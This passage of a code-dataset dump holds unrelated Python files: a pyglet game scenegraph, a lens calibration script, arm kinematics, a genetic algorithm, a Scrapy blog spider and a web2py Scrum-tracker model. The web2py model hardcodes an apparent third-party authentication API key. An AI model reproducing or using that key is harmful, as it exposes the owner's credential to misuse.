rect, colour, z=0):\n self.rect = rect\n self.colour = colour\n self.z = z\n\n def draw(self, camera):\n gl.glColor4f(*self.colour)\n r = self.rect\n z = self.z\n coords = ('v3f', [\n r.l, r.b, z,\n r.r, r.b, z,\n r.r, r.t, z,\n r.l, r.t, z,\n ])\n pyglet.graphics.draw(4, gl.GL_QUADS, coords)\n gl.glColor4f(1, 1, 1, 1)\n\n\nclass Bullet(Node):\n z = 0.1\n trail_width = 2\n\n batch = pyglet.graphics.Batch()\n MAX_AGE = 0.6\n MAX_LENGTH = 500\n\n def __init__(self, segment):\n self.seg = segment\n self.t = None\n self.build()\n\n def build(self, age=0):\n p1, p2 = self.seg.points\n across = self.seg.axis * 0.5 * self.trail_width\n\n length = self.seg.length / self.MAX_LENGTH\n frac = (age / self.MAX_AGE)\n frac2 = frac * frac\n c1 = (1, 1, 1, max(0, 0.1 - frac2))\n c2 = (1, 1, 1, min(1, length * self.MAX_AGE - frac2))\n\n bl = p1 - across\n br = p2 - across\n tr = p2 + across\n tl = p1 + across\n\n self.vl = pyglet.graphics.vertex_list(4,\n ('v2f', list(chain(bl, br, tr, tl))),\n ('c4f', list(chain(c1, c2, c2, c1))),\n )\n\n def update(self, age):\n self.vl.delete()\n self.build(age)\n\n def draw(self, camera):\n if self.t is None:\n self.t = self.scenegraph.t\n else:\n age = self.scenegraph.t - self.t\n if age > self.MAX_AGE:\n self.scenegraph.remove(self)\n return\n else:\n self.update(age)\n gl.glEnable(gl.GL_BLEND)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n self.vl.draw(gl.GL_QUADS)\n\n\nclass DebugGeometryNode(CompoundNode):\n z = 10\n def __init__(self, physics, colour=(1, 0, 1, 0.5)):\n self.physics = physics\n children = []\n for r in physics.static_geometry:\n children.append(RectNode(r, colour))\n super(DebugGeometryNode, self).__init__(children=children)\n\n def draw(self, camera):\n gl.glEnable(gl.GL_BLEND)\n gl.glBlendFunc(gl.GL_SRC_ALPHA, gl.GL_ONE_MINUS_SRC_ALPHA)\n super(DebugGeometryNode, self).draw(camera)\n for d in self.physics.dynamic:\n RectNode(d.get_rect(), (0, 1, 0, 0.5)).draw(camera)\n\n\nclass Fill(Node):\n z = -1000\n\n def __init__(self, colour):\n self.colour = colour\n\n def draw(self, camera):\n gl.glClearColor(*self.colour)\n gl.glClear(gl.GL_COLOR_BUFFER_BIT | gl.GL_DEPTH_BUFFER_BIT)\n\n\nclass Scenegraph(object):\n def __init__(self):\n self.objects = set()\n self.t = 0\n\n def update(self, dt):\n self.t += dt\n\n def add(self, obj):\n obj.set_scenegraph(self)\n self.objects.add(obj)\n\n def remove(self, obj):\n obj.set_scenegraph(None)\n self.objects.remove(obj)\n\n def draw(self, camera):\n camera.setup_matrixes()\n obs = list(self.objects)\n obs.sort(key=lambda x: x.z)\n gl.glDisable(gl.GL_DEPTH_TEST)\n for o in obs:\n o.draw(camera)\n\n def on_key_press(self, symbol, modifier):\n for o in self.objects:\n if hasattr(o, 'on_key_press'):\n o.on_key_press(symbol, modifier)\n\n\nif __name__ == '__main__':\n WIDTH = 800\n HEIGHT = 600\n w = pyglet.window.Window(width=800, height=600)\n s = Scenegraph()\n# s.add(Fill((1.0, 1.0, 1.0, 1.0)))\n# s.add(Wheels((91, 0)))\n# s.add(Wheels((992 - 236, 0)))\n# s.add(StaticImage((0, 53), 'car-interior.png'))\n# s.add(StaticImage((90, 115), 'pc-standing.png'))\n# s.add(StaticImage((600, 115), 'lawman-standing.png'))\n# s.add(StaticImage((300, 115), 'table.png'))\n# s.add(StaticImage((500, 115), 'crate.png'))\n s.add(RailTrack(pyglet.resource.texture('track.png')))\n ground = GroundPlane(\n (218, 176, 127, 255),\n (194, 183, 164, 255),\n )\n s.add(ground)\n\n s.add(SkyBox(\n (129, 218, 255, 255),\n (49, 92, 142, 255)\n ))\n\n s.add(Locomotive(pos=(0, 0)))\n camera = Camera((200.0, 200.0), WIDTH, HEIGHT)\n\n @w.event\n def on_draw():\n s.draw(camera)\n\n def update(dt):\n camera.offset += v(100, 0) * dt\n s.update(dt)\n\n pyglet.clock.schedule_interval(update, 1/60.0)\n pyglet.app.run()\n","repo_name":"lordmauve/last-train-to-nowhere","sub_path":"wildwest/scenegraph/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14961,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14054097091","text":"class product():\n def __init__(self,colour,price):\n print(\"This is parent class\")\n self.colour=colour\n self.price=price\n\n\nclass Mobile(product):\n def __init__(self,brand):\n print(\"this is child class\")\n self.brand=brand\n # print(\"first object : \",m.self.colour,\"price : \",m.price)\n print(\"Second object : \",b.colour,\"price : \",b.price)\n\n\np=product(\"Black\",2000)\nb=product(\"blue\",3000)\nm=Mobile(\"LG\")\n \n \n","repo_name":"anilsharma328/My-dev-work","sub_path":"Inheritance_example.py","file_name":"Inheritance_example.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23729838786","text":"import os, sys\nimport numpy as np\nfrom universal_lens_cal import LensCalibrator\n\n# project_path = 'D:/lens_cal/221222_FAT_completed/FAT3/'\n# project_path = 'D:/221220_75mm/'\n# project_path = 'D:/lens_cal/230125_after_AA/'\n# project_path = 'D:/lens_cal/230127_using_only_5_images_that_has_been_taken_after_AA/'\n# project_path = 'D:/lens_cal/230130/'\n# project_path = 'D:/lens_cal/230208_module_02/'\n# project_path = 'D:/lens_cal/230208_module_04/'\n# project_path = 'D:/lens_cal/230208_module_05/'\n# project_path = 'D:/lens_cal/230208_module_06/'\n# project_path = 'D:/lens_cal/230224_fov_test_module_04/'\n# project_path = 'D:/lens_cal/230302_fov_alpha_test_module_05/'\n# project_path = 'D:/lens_cal/230302_distortion_parameterizing/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module01/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module02/'\n# project_path = 'D:/lens_cal/230719_gen1.5_module05/'\nproject_path = 'D:/lens_cal/230811_gen1.5_module08/'\n\nraw_dir = project_path + 'raw/' # Designate the directory in which raw data files are stored.\nraw_pca_dir = project_path + 'raw_pca/' # PCA analysis results are saved here.\nraw_det_dir = project_path + 'raw_det/' # The blob detection result of raw data is saved here.\nraw_und_dir = project_path + 'raw_und/' # The undistorted result of raw data is saved here.\nraw_par_dir = project_path + 'raw_par/' # Camera and distortion parameters are saved here.\nraw_fov_dir = project_path + 'raw_fov/' # The undistorted results with various alpha are saved here.\nraw_und_det_dir = project_path + 'raw_und_det/' # The blob detection result of the undistorted images is saved here.\nraw_cur_dir = project_path + 'raw_cur/' # The curvature calculation result is saved here.\n\n# The same kind of directories for the flipped raw data.\nflip_dir = project_path + 'flip/'\nflip_pca_dir = project_path + 'flip_pca/'\nflip_det_ups_dir = project_path + 'flip_ups_det/'\nflip_ups_dir = project_path + 'flip_ups/'\nflip_und_ups_dir = project_path + 'flip_ups_und/'\nflip_und_dir = project_path + 'flip_und/'\n\n# The same kind of directories for the upscaled raw data. \nups_dir = project_path + 'ups/'\nups_pca_dir = project_path + 'ups_pca/'\nups_det_dir = project_path + 'ups_det/'\nups_und_dir = project_path + 'ups_und/'\nups_par_dir = project_path + 'ups_par/'\nups_fov_dir = project_path + 'ups_fov/'\nups_und_det_dir = project_path + 'ups_und_det/'\nups_und_pca_dir = project_path + 'ups_und_pca/'\n\n# Make directories.\nif os.path.exists(raw_pca_dir) is False: os.makedirs(raw_pca_dir)\nif os.path.exists(raw_det_dir) is False: os.makedirs(raw_det_dir)\nif os.path.exists(raw_und_dir) is False: os.makedirs(raw_und_dir)\nif os.path.exists(raw_par_dir) is False: os.makedirs(raw_par_dir)\nif os.path.exists(raw_fov_dir) is False: os.makedirs(raw_fov_dir)\nif os.path.exists(raw_und_det_dir) is False: os.makedirs(raw_und_det_dir)\nif os.path.exists(raw_cur_dir) is False: os.makedirs(raw_cur_dir)\n\nif os.path.exists(ups_dir) is False: os.makedirs(ups_dir)\nif os.path.exists(ups_pca_dir) is False: os.makedirs(ups_pca_dir)\nif os.path.exists(ups_det_dir) is False: os.makedirs(ups_det_dir)\nif os.path.exists(ups_und_dir) is False: os.makedirs(ups_und_dir)\nif os.path.exists(ups_par_dir) is False: os.makedirs(ups_par_dir)\nif os.path.exists(ups_fov_dir) is False: os.makedirs(ups_fov_dir)\nif os.path.exists(ups_und_det_dir) is False: os.makedirs(ups_und_det_dir)\nif os.path.exists(ups_und_pca_dir) is False: os.makedirs(ups_und_pca_dir)\n\n# Defining the dimensions of checkerboard.\nh = 5 # height.\nw = 20 # width.\nCHECKERBOARD = (h, w)\n\nhg, vg = 5, 5 # The horizontal gap and vertical gap between the blobs, in cm units.\nshoot = LensCalibrator('.png', 'Ambient')\n\n# Flip the raw image data.\n# flip_dir = shoot.flip()\n# Execute the blob detection on the raw images.\nMwps, Mips_raw, fnames_found, raw_size = \\\n shoot.simpleblob_detection(raw_dir, raw_pca_dir, CHECKERBOARD, 5, 5, minArea=0, upscale=False, savedir=raw_det_dir)\n\n# Execute the blob detection on the upscaled images.\nMwps, Mips_ups, Mips_raw, fnames_found, ups_size, raw_size = \\\n shoot.simpleblob_detection(raw_dir, ups_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_det_dir, ups_dir=ups_dir, upscale=True, sf=4)\n\n#ret, cv2_intr, cv2_dist, cv2_rvecs, cv2_tvecs = cv2.calibrateCamera(Mwps, Mips, CHECKERBOARD, None, None, flags=cv2.CALIB_RATIONAL_MODEL)\nfx_ups = ups_size[0] / np.sqrt(3)\nfy_ups = fx_ups # This should be the same with fx, because the lens is isotopic even though the sensor is not.\ncx_ups = ups_size[0] / 2 - 1\ncy_ups = ups_size[1] / 2 - 1\n\nfx_raw = raw_size[0] / np.sqrt(3)\nfy_raw = fx_raw\ncx_raw = raw_size[0] / 2 - 1\ncy_raw = raw_size[1] / 2 - 1\n\ninit_ups = np.array([[fx_ups, 0, cx_ups], [0, fy_ups, cy_ups], [0, 0, 1]])\ninit_raw = np.array([[fx_raw, 0, cx_raw], [0, fy_raw, cy_raw], [0, 0, 1]])\n# init_raw = np.array([[10, 0, 10], [0, 10, 10], [0, 0, 1]])\n\nret, intr_ups, dist_ups, rvecs_ups, tvecs_ups = shoot.calibrate(Mwps, Mips_ups, ups_size, init_ups, ups_par_dir)\nret, intr_raw, dist_raw, rvecs_raw, tvecs_raw = shoot.calibrate(Mwps, Mips_raw, raw_size, init_raw, raw_par_dir)\n\n# Undistort the images using initial guess.\nfor alpha in [0, 0.5, 0.6]:\n newcm_ups, roi_ups = shoot.get_undistorted_images(ups_dir, ups_und_dir, intr_ups, dist_ups, alpha=alpha)\n newcm_raw, roi_raw = shoot.get_undistorted_images(raw_dir, raw_und_dir, intr_raw, dist_raw, alpha=alpha)\n\n np.save(raw_par_dir+f'newcm_alpha_{alpha}', newcm_raw)\n np.save(ups_par_dir+f'newcm_alpha_{alpha}', newcm_ups)\n\n np.savetxt(raw_par_dir+f'newcm_alpha_{alpha}.txt', newcm_raw, fmt='%.2e')\n np.savetxt(ups_par_dir+f'newcm_alpha_{alpha}.txt', newcm_ups, fmt='%.2e')\n\n print(f\"The intrinsic parameters of the raw images when alpha = {alpha}: {newcm_raw}\")\n print(f\"The distortion parameters of the raw images: {dist_raw}\")\n\n# sys.exit()\n\n\"\"\"\n# Find curvature of the uppermost line.\nintr_raw = np.load(raw_par_dir+'intrinsic_alpha_0.npy') # Load the intrinsic parameters.\ndist_raw = np.load(raw_par_dir+'distortion.npy') # Load the distortion parameters.\n_, Mips_und_ups, _, _ = shoot.simpleblob_detection(ups_und_dir, ups_und_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_und_det_dir, upscale=False, minArea=0)\n\nresolution = (192,56)\nMwps, Mips_ups, fnames_dis = shoot.load_wps_ips(ups_det_dir, CHECKERBOARD, hg, vg)\n_, Mips_ups_und, fnames_und = shoot.load_wps_ips(ups_und_det_dir, CHECKERBOARD, hg, vg)\ncur_dis, cur_und, Mips_und = shoot.get_max_curvature(Mips_ups, Mips_ups_und, fnames_dis, CHECKERBOARD, 4, resolution, raw_cur_dir)\n\n# FOV comparison.\nresolution = (192,56)\nintr_raw = np.load(raw_par_dir+'intrinsic_alpha_0.npy')\ndist_raw = np.load(raw_par_dir+'distortion.npy')\ndst, udst = shoot.fov_comparison(resolution, 1, intr_raw, dist_raw, raw_fov_dir)\n\nshoot.get_undistorted_images(raw_dir, raw_und_dir, intr_raw, dist_raw, sf=1, alpha=0.0)\nMwps, Mips_ups, Mips_raw, fnames_found, ups_size, raw_size = \\\n shoot.simpleblob_detection(raw_dir, ups_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_det_dir, ups_dir=ups_dir, upscale=True, sf=4)\nnp.savetxt('mips.txt', Mips_raw[0])\nMwps, Mips_und_ups, Mips_und_raw, fnames_found, ups_size, raw_size = \\\n shoot.simpleblob_detection(raw_und_dir, ups_und_pca_dir, CHECKERBOARD, 5, 5, savedir=ups_und_det_dir, ups_dir=ups_und_dir, upscale=True, sf=4)\nnp.savetxt('mips_und.txt', Mips_und_raw[0])\n\"\"\"\n\nprint(\"finished.\")","repo_name":"steve1029/camera_cal","sub_path":"lidar_geo_cal.py","file_name":"lidar_geo_cal.py","file_ext":"py","file_size_in_byte":7356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8076812183","text":"from __future__ import print_function\n\nimport math\nimport unittest\nfrom functools import reduce\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D # pylint: disable=W0611\n\nimport matplotlib.patches as mpatches\nimport matplotlib.transforms as mtransforms\nimport mpl_toolkits.mplot3d.axes3d as p3\n\nfrom matplotlib import animation\nfrom IPython.display import HTML\n\nimport gtsam\nimport gtsam.utils.plot as gtsam_plot\nfrom gtsam import Pose2\n\n# Some utility functions for Pose2\ndef vector3(x, y, z):\n\t\"\"\"Create 3D double numpy array.\"\"\"\n\treturn np.array([x, y, z], dtype=np.float)\n\n\ndef compose(*poses):\n\t\"\"\"Compose all Pose2 transforms given as arguments from left to right.\"\"\"\n\treturn reduce((lambda x, y: x.compose(y)), poses)\n\n\ndef vee(M):\n\t\"\"\"Pose2 vee operator.\"\"\"\n\treturn vector3(M[0, 2], M[1, 2], M[1, 0])\n\n\ndef delta(g0, g1):\n\t\"\"\"Difference between x,y,,theta components of SE(2) poses.\"\"\"\n\treturn vector3(g1.x() - g0.x(), g1.y() - g0.y(), g1.theta() - g0.theta())\n\n\ndef trajectory(g0, g1, N=20):\n\t\"\"\" Create an interpolated trajectory in SE(2), treating x,y, and theta separately.\n\t\tg0 and g1 are the initial and final pose, respectively.\n\t\tN is the number of *intervals*\n\t\tReturns N+1 poses\n\t\"\"\"\n\te = delta(g0, g1)\n\treturn [Pose2(g0.x()+e[0]*t, g0.y()+e[1]*t, g0.theta()+e[2]*t) for t in np.linspace(0, 1, N)]\n\n# The 3-link manipulator class\n\nclass ThreeLinkArm(object):\n\t\"\"\"Three-link arm class.\"\"\"\n\n\tdef __init__(self):\n\t\tself.L1 = 3.5\n\t\tself.L2 = 3.5\n\t\tself.L3 = 2.5\n\n\tdef fk(self, q):\n\t\t\"\"\" Forward kinematics.\n\t\t\tTakes numpy array of joint angles, in radians.\n\t\t\"\"\"\n\n\t\tT_0 = Pose2(0, 0, math.radians(90) + q[0])\n\t\tT1 = Pose2(self.L1, 0, q[1])\n\t\tT2 = Pose2(self.L2, 0, q[2])\n\t\tT3 = Pose2(self.L3, 0, 0)\n\t\tout = compose(T_0, T1, T2, T3)\n\n\t\treturn out\n\n\tdef jacobian(self, q):\n\t\t\"\"\" Calculate manipulator Jacobian.\n\t\t\tTakes numpy array of joint angles, in radians.\n\t\t\"\"\"\n\n\t\ttheta1 = q[0]\n\t\ttheta2 = q[1]\n\t\ttheta3 = q[2]\n\n\t\talpha = theta1 + theta2 \n\t\tbeta = theta1 + theta2 + theta3\n\n\t\tJ = [[-self.L1 * math.cos(theta1) - self.L2 * math.cos(alpha) - self.L3 * math.cos(beta),\n\t\t\t -self.L2 * math.cos(alpha) - self.L3 * math.cos(beta), - self.L3 * math.cos(beta)], \n\t\t\t [-self.L1 * math.sin(theta1) - self.L2 * math.sin(alpha) - self.L3 * math.sin(beta),\n\t\t\t - self.L2 * math.sin(alpha) - self.L3 * math.sin(beta), - self.L3 * math.sin(beta)], \n\t\t\t [1, 1, 1]]\n\n\t\tJ = np.array(J)\n\n\t\treturn J\n\t\ndef main(): \n\t# First set up the figure, the axis, and the plot element we want to animate\n\tfig, ax = plt.subplots()\n\tplt.close()\n\tN=50\n\tsize=10.5\n\tax.set_xlim((-size, size))\n\tax.set_ylim((-size, size))\n\tomega = 2*math.pi/N\n\n\tarm = ThreeLinkArm()\n\tq = np.radians(vector3(30, -30, 45))\n\tsTt_initial = arm.fk(q)\n\tsTt_goal = Pose2(2.4, 4.3, math.radians(0))\n\tposes = trajectory(sTt_initial, sTt_goal, N)\n\n\tdef init():\n\t\trect = mpatches.Rectangle([0,0], 1, 1, angle =0)\n\t\treturn (rect,)\n\n\t# animation function. This is called sequentially \n\tdef animate(i):\n\t\tglobal pose\n\t\tglobal arm\n\t\tglobal q\n\n\t\t# Computes the forward kinematics to get the pose of the end-effector for the given angular position of the joints (q)\n\t\tsTt = arm.fk(q)\n\t\t# Evaluate the error between the current position of the end-effector and the desired position at moment i\n\t\terror = delta(sTt, poses[i])\n\t\t# Get the jacobian of the arm at the given pose\n\t\tJ = arm.jacobian(q)\n\t\t# Move the arm joints in the respective direction\n\t\tq += np.dot(np.linalg.inv(J), error)\n\n\t\t# ------------------------- ANIMATION ----------------------------------------------------\n\t\trect = rect = mpatches.Rectangle([-0.5,-0.5], 1, 1, angle =0)\n\t\tax.clear()\n\t\tax.set_xlim((-size, size))\n\t\tax.set_ylim((-size, size))\n\t\tax.add_artist(rect)\n\t\t\n\t\tsXl1 = Pose2(0, 0, math.radians(90))\n\t\tl1Zl1 = Pose2(0, 0, q[0])\n\t\tl1Xl2 = Pose2(arm.L1, 0, 0)\n\t\tsTl2 = compose(sXl1, l1Zl1, l1Xl2)\n\t\tt1 = sTl2.translation()\n\t\tax.add_artist(mpatches.Rectangle([0,0], 3.5, 0.1, angle =q[0]*180/np.pi+90, color='r'))\n\n\t\tl2Zl2 = Pose2(0, 0, q[1])\n\t\tl2Xl3 = Pose2(arm.L2, 0, 0)\n\t\tsTl3 = compose(sTl2, l2Zl2, l2Xl3)\n\t\tt2 = sTl3.translation()\n\t\tax.add_artist(mpatches.Rectangle([t1.x(),t1.y()], 3.5, 0.1, angle =(q[0]+q[1])*180/np.pi+90, color='g'))\n\n\t\tl3Zl3 = Pose2(0, 0, q[2])\n\t\tl3Xt = Pose2(arm.L3, 0, 0)\n\t\tsTt = compose(sTl3, l3Zl3, l3Xt)\n\t\tt3 = sTt.translation()\n\t\tax.add_artist(mpatches.Rectangle([t2.x(),t2.y()], 2.5, 0.1, angle =(q[0]+q[1]+q[2])*180/np.pi+90, color='b'))\n\n\tanimation.FuncAnimation(fig, animate, init_func=init, \n\t\t\t\t\t\t\tframes=N, interval=100, blit=False)\n\n\nif __name__ == '__main__':\n\tmain()\n\n\n\n\n","repo_name":"sanmesh1/MobileManipulationFinalProject","sub_path":"kinematics_course.py","file_name":"kinematics_course.py","file_ext":"py","file_size_in_byte":4583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41360093406","text":"#------------------------------------------------------------#\n# #\n# genetic_algorithm.py #\n# #\n# genetic_algorithm.py performs evolutionary optimzation us- #\n# ing genetic algorithm. It is a research code that uses var-#\n# ious selection, crossover, and mutation methods to find #\n# the minimum of a given objective. #\n# #\n# Input(s): #\n# #\n# Output(s): #\n# Minimum value #\n# #\n# Author : Jack Rossetti #\n# Date : 21-10-04 #\n# Contact : jsrossetti23@gmail.com #\n# #\n#------------------------------------------------------------#\nimport random\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nprint(\"\");\nprint(\"****************************************************************\");\nprint(\"* *\");\nprint(\"* genetic_algorithm.py *\");\nprint(\"* *\");\nprint(\"* genetic_algorithm.py performs evolutionary optimzation using *\");\nprint(\"* a genetic algorithm. It is a research code that uses various *\");\nprint(\"* selection, crossover, and mutation methods to find the mini- *\");\nprint(\"* mum of a given objective. *\");\nprint(\"* *\");\nprint(\"* Input(s): *\");\nprint(\"* *\");\nprint(\"* Output(s): *\");\nprint(\"* Minimum value *\");\nprint(\"* *\");\nprint(\"* Author : Jack Rossetti *\");\nprint(\"* Date : 21-10-04 *\");\nprint(\"* Contact : jsrossetti23@gmail.com *\");\nprint(\"* *\");\nprint(\"****************************************************************\");\nprint(\"\");\n\nseed = 19920123;\n#random.seed(seed);\n\ncrossover = 0.85;\nmutation = 0.005;\n\nNsol = 10000;\nxmax = 100.0;\nxmin = -100.0;\nrng = xmax-xmin;\noffset= xmin/rng;\ndx = (xmax-xmin)/(Nsol-1)\nxsol = np.zeros([Nsol,1]);\nfsol = np.zeros([Nsol,1]);\nfor i in range(0, Nsol):\n## begin for i\n xsol[i] = xmin+dx*i;\n fsol[i] = xsol[i]*xsol[i]#+1000*math.sin(15*math.pi*xsol[i]/rng);\n## end for i\n \nNgene = 16;\nMpop = 10;\nBmax = 2.0**(Ngene)-1.0;\nx = np.zeros([Mpop,Ngene])\nxbin = np.zeros([Mpop, 1])\nxind = np.zeros([Mpop, 1])\nfind = np.zeros([Mpop, 1])\nnind = np.zeros([Mpop, 1])\n\n#\n# Initialize population\n#\nfor ipop in range(0,Mpop):\n## begin for ipop\n xsum = 0;\n for igene in range(1,Ngene+1):\n ## begin for igene\n ii = Ngene-igene;\n x[ipop,ii] = random.randint(0,1);\n ## end for igene\n## end for ipop\n\nNiter = 250;\n\nfig = plt.figure();\n \nfor k in range(0,Niter):\n## begin for k\n fsum = 0;\n for ipop in range(0,Mpop):\n ## begin for ipop\n xsum = 0;\n for igene in range(1,Ngene+1):\n ## begin for igene\n ii = Ngene-igene;\n xsum = x[ipop,ii]*2**(igene-1) + xsum;\n ## end for igene\n xval = ((xsum/Bmax)+offset)*rng;\n xbin[ipop] = xsum;\n xind[ipop] = xval;\n find[ipop] = xval*xval#+1000*math.sin(15*math.pi*xval/rng);\n fsum = fsum + find[ipop];\n ## end for ipop\n \n for ipop in range(0,Mpop):\n ## begin for ipop\n nind[ipop] = 1-(find[ipop]/fsum);\n ## end for ipop\n\n if(k > 0):\n plt.clf();\n \n plt.plot(xsol, fsol);\n plt.plot(xind, find, 'ro');\n plt.draw();\n plt.pause(0.001);\n \n sort_find = np.argsort(find, axis=0);\n \n #\n # Determine the mating pool\n #\n xnew = np.zeros([Mpop, Ngene]);\n \n for imate in range(0, int(Mpop/2)):\n ## begin for imate\n \n xparent = np.zeros([ 2,Ngene]);\n \n for iparent in range(0,2):\n ## begin for ipop\n R = random.random();\n rsum = 0;\n for jpop in range(0,Mpop):\n ## begin for jpop\n rsum = rsum + nind[sort_find[jpop]]\n if(rsum > R):\n ## begin if\n xparent[iparent,:] = x[sort_find[jpop],:];\n break;\n ## end if\n ## end for jpop\n ## end for ipop\n\n xchild= xparent;\n R = random.random();\n if(R < crossover):\n ## begin if\n cgene = random.randint(1,Ngene-1);\n for igene in range(cgene+1,Ngene+1):\n ## begin for igene\n ii = Ngene-igene\n xchild[0,ii] = xparent[1,ii];\n xchild[1,ii] = xparent[0,ii];\n ## end for igene\n ## end if\n\n for ichild in range(0,2):\n ## begin for ichild\n for igene in range(1,Ngene+1):\n ## begin for igene\n ii= Ngene-igene;\n R = random.random();\n if(R < mutation):\n ## begin if\n if(xchild[ichild,ii] > 0):\n ## begin if\n xchild[ichild,ii] = 0;\n elif(xchild[ichild,ii] < 1):\n xchild[ichild,ii] = 1;\n ## end if\n ## end if\n ## end for igene\n ## end for ichild\n\n xnew[2*imate ,:] = xchild[0,:];\n xnew[2*imate+1,:] = xchild[1,:];\n \n ## end for imate\n\n x = xnew;\n fstar = min(find);\n print(\"Iteration: %5d, favg = %8.4f, fmin = %10.4e\" % (k, fsum/Mpop, fstar) );\n\n## end for k\n\nplt.show();\n\nexit();\n","repo_name":"jack-s-rossetti/coding_projects","sub_path":"python_scripts/genetic_algorithm.py","file_name":"genetic_algorithm.py","file_ext":"py","file_size_in_byte":6430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"71405190546","text":"import scrapy\nfrom elenkov.items import Article\nfrom datetime import datetime\nfrom scrapy.loader import ItemLoader\n\n\nclass ElenSpider(scrapy.Spider):\n name = 'elen'\n allowed_domains = ['elenkov.net']\n start_urls = ['http://elenkov.net/блог-2/']\n\n def parse(self, response):\n categories = response.xpath(\"//section[@id='categories-2']/ul/li/a\")\n for category in categories:\n category_name = category.xpath(\".//text()\").get()\n yield response.follow(category, self.parse_category, cb_kwargs=dict(category=category_name))\n\n def parse_category(self, response, category):\n articles = response.xpath(\"//div[@class='slide-content']\")\n for article in articles:\n date = article.xpath(\".//div[@class='slide-meta']//time/text()\").get() or \"Not available\"\n link = article.xpath(\".//header/h3/a/@href\").get()\n yield response.follow(link, self.parse_article, cb_kwargs=dict(category=category, date=date))\n\n next_page = response.xpath(\"//a[text()='›']/@href\").get()\n if next_page:\n yield response.follow(next_page, self.parse_category, cb_kwargs=dict(category=category))\n\n def parse_article(self, response, category, date):\n item = ItemLoader(item=Article(), response=response)\n\n title = response.xpath(\"//h1/a/text()\").get() or \"Not available\"\n author = response.xpath(\"//a[@rel='author']/text()\").get() or \"Not available\"\n content = response.xpath(\"//div[@class='entry-content']/descendant-or-self::*/text()\").getall()\n content = [text for text in content if text.strip()]\n content = \" \".join(content)\n\n if date != \"Not available\":\n date_time_obj = datetime.strptime(date, '%d.%m.%Y')\n date = date_time_obj.strftime(\"%Y/%m/%d\")\n\n item.add_value('title', title)\n item.add_value('author', author)\n item.add_value('date', date)\n item.add_value('category', category)\n item.add_value('link', response.url)\n item.add_value('content', content)\n\n return item.load_item()\n","repo_name":"daniel-kanchev/elenkov","sub_path":"elenkov/spiders/elen.py","file_name":"elen.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"9469791020","text":"from gluon.tools import Auth, Service, PluginManager,prettydate\nimport os\n\ndb = DAL(\"sqlite://storage.sqlite\")\nresponse.generic_patterns = ['*'] if request.is_local else []\nauth = Auth(db, hmac_key=Auth.get_or_create_key())\nservice = Service()\nplugins = PluginManager()\n\n## create all tables needed by auth if not custom tables\nauth.define_tables(username=False, signature=False)\nauth.settings.extra_fields['auth_user']= [Field('Pic','upload'),Field('About_Me','text')]\n\n\n## configure auth policy\nauth.settings.registration_requires_verification = False\nauth.settings.registration_requires_approval = False\nauth.settings.reset_password_requires_verification = True\n\n# modify default policy on creating unique groups for each user\nauth.settings.create_user_groups = None\n\n\n\nif auth.user_id != None:\n setGroup=auth.user_groups.copy()\nelif auth.user_id is None:\n setGroup=[\"None\",\"You Need to Log In\"]\n \nfrom gluon.contrib.login_methods.rpx_account import RPXAccount\nauth.settings.actions_disabled=['register', 'change_password','request_reset_password']\nauth.settings.login_form = RPXAccount(request,\n api_key='73dab71b7fdfc0f49c10f8e64ee6a5adcf66b2c3',\n domain='ScrumLite',\n url = \"http://scrumlite.rpxnow.com/%s/default/user/login\" % request.application)\n\ndb.define_table('images',\n Field('image', 'upload', uploadfolder=os.path.join(request.folder,'uploads')),\n Field('user',db.auth_user))\n\ndb.images.user.writable = db.images.user.readable = False\n\ndb.define_table('Team',\n Field('product_owner', 'reference auth_user', default=auth.user_id, writable = False),\n Field('product_name', requires = IS_NOT_EMPTY()),\n Field('team_name', requires = IS_NOT_EMPTY()),\n Field('team_leader', 'reference auth_user'),\n Field('team_group', 'reference auth_group'),\n Field('product_description', 'text', requires = IS_NOT_EMPTY()),\n format = '%(team_name)s')\n\ndb.Team.id.readable = False\n\ndb.define_table('Sprint',\n Field('sprint_name'),\n Field('start_date', 'date'),\n Field('end_date', 'date'),\n Field('team_id', 'reference Team')\n)\n\ndb.define_table('Story',\n Field('backlogged', type = 'boolean', default = 'True'),\n Field('sprint_id', 'reference Sprint', default=None),\n Field('team_id', 'reference Team'),\n Field('user_story','text', requires = IS_NOT_EMPTY()),\n Field('story_points','integer', default=0),\n Field('completed', type = 'boolean', default = 'False', readable=False),\n Field('created_on', 'datetime', default=request.now, writable = False),\n Field('created_by', 'reference auth_user', default=auth.user_id),\n )\n\ndb.Story.sprint_id.readable = False\ndb.Story.completed.readable = False\ndb.Story.created_by.writable = False\n\ndb.define_table('Task',\n Field('name', requires = IS_NOT_EMPTY()),\n Field('description', 'text', requires = IS_NOT_EMPTY()),\n Field('status','string', requires=IS_IN_SET([\"To do\", \"In progress\", \"Done\"]), default=\"To do\"),\n Field('assigned', 'reference auth_user', default=None),\n Field('task_creation_time', 'datetime', default=request.now, writable = False),\n Field('estimated_completion_time', 'datetime', requires = IS_DATETIME()),\n Field('task_points', 'integer', requires=IS_IN_SET(['0','1','2','3','5','8','13','21'])),\n Field('story_id', 'reference Story')\n )\n\ndb.define_table('Comments',\n Field('task_id', 'reference Task'),\n Field('date', 'datetime', default=request.now),\n Field('from_user', 'reference auth_user', default=auth.user_id),\n Field('comment', 'string', requires=IS_NOT_EMPTY())\n )\n\nif auth.user_groups.keys():\n query = ((db.auth_group.id==auth.user_groups.keys()[0]) & 